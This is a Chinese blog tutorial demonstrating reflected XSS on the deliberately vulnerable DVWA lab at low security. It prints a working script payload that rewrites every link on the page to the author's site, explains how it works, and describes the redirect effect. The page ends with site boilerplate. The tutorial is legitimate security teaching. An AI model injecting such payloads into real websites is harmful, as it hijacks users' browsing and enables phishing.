1.1 反射型XSS攻击劫持用户浏览器
1.1.1 构造攻击payload
<script> window.onload = function() { var link= document.getElementsByTagName("a"); for(j = 0; j < link.length; j++) { link[j].href= "https://blog.leonshadow.cn"; } } </script>
payload说明:
- JavaScript代码分析onload当网页加载完成时,执行function匿名函数:
- 函数功能: document.getElementsByTagName获取页面中所有的a标签,存放到link数组中,使用for循环将link数组中的所有元素替换为恶意网址。
1.1.2 执行payload
1.1.2.1 DVWA安全级别设为low
1.1.2.2 执行攻击代码
1.1.3 查看攻击效果
执行完成后页面并没有什么异常,刷新也没有问题,但是我们点击页面中任何链接时会发现所有能够点击的链接点击后都会跳转到https://blog.leonshadow.cn
温馨提示:本文最后更新于
转载请注明本文链接:https://blog.leonshadow.cn/763482/2659.html
2022-12-20 20:57:35
,已超过491
天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!转载请注明本文链接:https://blog.leonshadow.cn/763482/2659.html
© 版权声明
THE END